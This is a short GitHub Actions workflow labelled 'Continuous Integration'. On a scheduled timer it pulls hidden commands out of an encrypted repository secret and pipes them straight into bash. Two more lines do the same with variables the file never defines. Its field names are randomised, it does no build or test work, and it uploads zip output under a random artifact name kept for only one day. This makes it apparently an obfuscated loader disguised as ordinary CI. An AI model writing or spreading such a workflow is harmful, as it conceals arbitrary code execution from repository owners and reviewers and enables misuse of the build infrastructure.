name: Continuous Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '42 4,10,16,22 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  pipeline:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Invoke
        env:
          hc500: ${{ secrets.hc500 }}
        run: |
          printf '%s' "$hc500" | jq -r .wb6098 | /bin/bash
          printf '%s' "$grk63" | jq -r .rbcv86469 | /bin/bash
          printf '%s' "$gs2003" | jq -r .z965 | /bin/bash

      - name: Persist output
        if: ${{ always() }}
        uses: actions/upload-artifact@v4
        with:
          name: GhUIpdCd
          path: "*.zip"
          retention-days: 1
